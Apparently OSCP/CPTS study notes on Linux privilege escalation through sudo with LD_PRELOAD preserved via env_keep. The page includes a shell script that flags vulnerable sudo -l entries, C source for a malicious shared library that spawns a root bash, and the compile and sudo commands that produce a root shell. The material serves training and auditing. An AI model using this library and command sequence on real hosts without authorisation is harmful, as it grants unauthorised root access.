OSCP-CPTS NOTES

Sudo + LD_PRELOAD (Shared Libraries)

This attack needs two things: a user who may run some command through sudo (which command does not matter, as long as it is dynamically linked) and a sudoers configuration that lets the LD_PRELOAD environment variable survive the sudo call.

Shared libraries are collections of precompiled code that can be used by multiple programs simultaneously. They provide a way to modularize code, allowing functions and data to be shared across different applications without the need to duplicate the code.

LD_PRELOAD: An environment variable used in Unix-like operating systems to specify a shared library to be loaded before others when a program is run. It can be used to override functions in standard libraries.

Understanding the Context:

  • If a user may run a dynamically linked program with sudo, and sudo passes LD_PRELOAD through to that program, the user can inject a shared library of their own. The dynamic loader maps it into the root-owned process before libc, so its initialisation code runs as root and its functions can shadow the libc functions the program calls.

Example User

dollarboysushil@pc1:~$ sudo -l
Matching Defaults entries for dollarboysushil on pc1:
    env_reset, mail_badpass, ..., env_keep+=LD_PRELOAD

User dollarboysushil may run the following commands on pc1:
    (root) NOPASSWD: /usr/bin/ping

Attack Scenario

In the example above, dollarboysushil may run /usr/bin/ping as root without entering a password (NOPASSWD). The interesting part is env_keep+=LD_PRELOAD: env_reset normally rebuilds the environment of the command sudo runs from a small allowlist, and env_keep adds LD_PRELOAD to that allowlist, so the variable survives the sudo call and reaches the root process. A command tagged SETENV in sudoers has the same effect for variables given on the sudo command line, even without env_keep.

The attack is therefore to build a malicious shared library, pass its path in LD_PRELOAD when invoking sudo ping, and let the dynamic loader map the library into the root-owned ping process, where its initialisation code runs before ping's main().
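As an added example (not from the original notes), here is a shell check that reads the text of sudo -l and reports which root-runnable commands can carry LD_PRELOAD. It goes slightly beyond the page's case: besides env_keep+=LD_PRELOAD it also flags commands tagged SETENV, which the sudoers manual documents as exempting VAR=value assignments on the sudo command line from the env_keep restrictions. The three sample outputs are constructed for this example and assume the entry layout of sudo -l shown above.

```shell
#!/bin/sh
# Added example (not from the original notes): read the text of `sudo -l` and
# report which root-runnable commands can carry LD_PRELOAD. Samples below are
# constructed for this demo and follow the layout of the sudo -l output above.

# Constructed: the page's case, LD_PRELOAD preserved by env_keep.
SAMPLE_ENVKEEP='Matching Defaults entries for dollarboysushil on pc1:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=LD_PRELOAD

User dollarboysushil may run the following commands on pc1:
    (root) NOPASSWD: /usr/bin/ping
    (root) /usr/bin/find
    (www-data) /usr/bin/id'

# Constructed: no env_keep, but one command tagged SETENV, which lets the
# caller pass VAR=value on the sudo command line regardless of env_keep.
SAMPLE_SETENV_ONLY='Matching Defaults entries for bob on pc3:
    env_reset, mail_badpass

User bob may run the following commands on pc3:
    (root) NOPASSWD: /usr/bin/ping
    (root) NOPASSWD: SETENV: /usr/bin/find'

# Constructed: env_reset with no escape hatch.
SAMPLE_HARDENED='Matching Defaults entries for alice on pc2:
    env_reset, mail_badpass

User alice may run the following commands on pc2:
    (root) NOPASSWD: /usr/bin/ping'

# ld_preload_kept TEXT: true if a Defaults line keeps LD_PRELOAD, whether
# written env_keep+=LD_PRELOAD or env_keep+="LD_PRELOAD LD_LIBRARY_PATH".
ld_preload_kept() {
  printf '%s\n' "$1" | grep -Eq 'env_keep *\+?= *"?[^"]*LD_PRELOAD'
}

# root_sudo_entries TEXT: for every rule whose runas is root or ALL, print
# "<command>TAB<tags>" (tags comma-separated, "-" when none). Tags apply to
# every later command of the same rule, as they do in sudoers.
root_sudo_entries() {
  printf '%s\n' "$1" | awk '
    /^[ \t]*\((root|ALL)([ \t]*:[^)]*)?\)/ {
      line = $0; tags = ""
      sub(/^[ \t]*\([^)]*\)[ \t]*/, "", line)          # drop "(root) "
      n = split(line, parts, /, +/)                    # "cmd1, TAG: cmd2"
      for (i = 1; i <= n; i++) {
        p = parts[i]
        while (match(p, /^[A-Z_]+:[ \t]*/)) {          # NOPASSWD:, SETENV:, ...
          tags = tags (tags == "" ? "" : ",") substr(p, 1, index(p, ":") - 1)
          p = substr(p, RLENGTH + 1)
        }
        sub(/[ \t]+$/, "", p)
        if (p != "") printf "%s\t%s\n", p, (tags == "" ? "-" : tags)
      }
    }'
}

root_sudo_commands() { root_sudo_entries "$1" | cut -f1; }

setenv_sudo_commands() {
  root_sudo_entries "$1" | awk -F'\t' '{
    n = split($2, t, ",")
    for (i = 1; i <= n; i++) if (t[i] == "SETENV") { print $1; break }
  }'
}

# ld_preload_exploitable TEXT: print one "LD_PRELOAD via: <command>" line per
# usable entry; return 0 if any, 1 if the technique does not apply.
ld_preload_exploitable() {
  if ld_preload_kept "$1"; then
    cmds=$(root_sudo_commands "$1")       # any root command will do
  else
    cmds=$(setenv_sudo_commands "$1")     # only SETENV-tagged ones
  fi
  [ -n "$cmds" ] || return 1
  printf '%s\n' "$cmds" | sed 's/^/LD_PRELOAD via: /'
}

ld_preload_exploitable "$SAMPLE_ENVKEEP"
ld_preload_exploitable "$SAMPLE_SETENV_ONLY"
ld_preload_exploitable "$SAMPLE_HARDENED" || echo "pc2: LD_PRELOAD not kept and no SETENV; technique does not apply"
```

On a real host, feed it the live output with `ld_preload_exploitable "$(sudo -l 2>/dev/null)"`. Entries whose runas is another user are ignored, since a library loaded into a www-data process gains nothing.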

Creating malicious shared libraries

#include <stdio.h>
#include <stdlib.h>      /* unsetenv, system */
#include <sys/types.h>
#include <unistd.h>      /* setgid, setuid */

/* Compiled with -nostartfiles, this replaces the default _init, so the
   dynamic loader calls it as soon as the library is mapped into the
   process sudo spawned, before the target program's main(). */
void _init() {
    unsetenv("LD_PRELOAD");   /* do not re-inject into the shell we spawn */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

In malicious.c above, _init runs when the loader maps the library. It first removes LD_PRELOAD from the environment, so the shell it spawns (and every child of that shell) is not hooked again, then sets the gid and uid to 0 (root) and spawns bash. sudo already runs ping with real and effective uid 0, so the setgid/setuid calls succeed trivially and bash inherits root.

Compile malicious.c into a shared library:

dollarboysushil@pc1:~$ gcc -fPIC -shared -o malicious.so malicious.c -nostartfiles

-fPIC -shared produces position-independent code linked as a shared object, malicious.so. -nostartfiles keeps the compiler's own startup objects (crti.o/crtn.o) out of the link, which is what lets our _init stand in for the default one; without it the link fails on a multiple definition of _init.

Now run ping through sudo with the library in LD_PRELOAD. The variable has to be given on sudo's own command line, as below. Setting it in the shell first (LD_PRELOAD=... sudo ...) does not work: sudo is a setuid binary, and the dynamic loader ignores and removes LD_PRELOAD while starting it, so nothing is left to pass on to ping. sudo accepts the VAR=value form here because LD_PRELOAD is in env_keep. ping never gets as far as complaining about missing arguments, since _init runs before main().

dollarboysushil@pc1:~$ sudo LD_PRELOAD=/location_of_malicious_library/malicious.so /usr/bin/ping
root@pc1:~# whoami
root

We are now root.

Last updated 7 months ago

Watch this excellent video by conda.

https://youtu.be/bzjnIi5u9OQ?list=PLDrNMcTNhhYrBNZ_FdtMq-gLFQeUZFzWV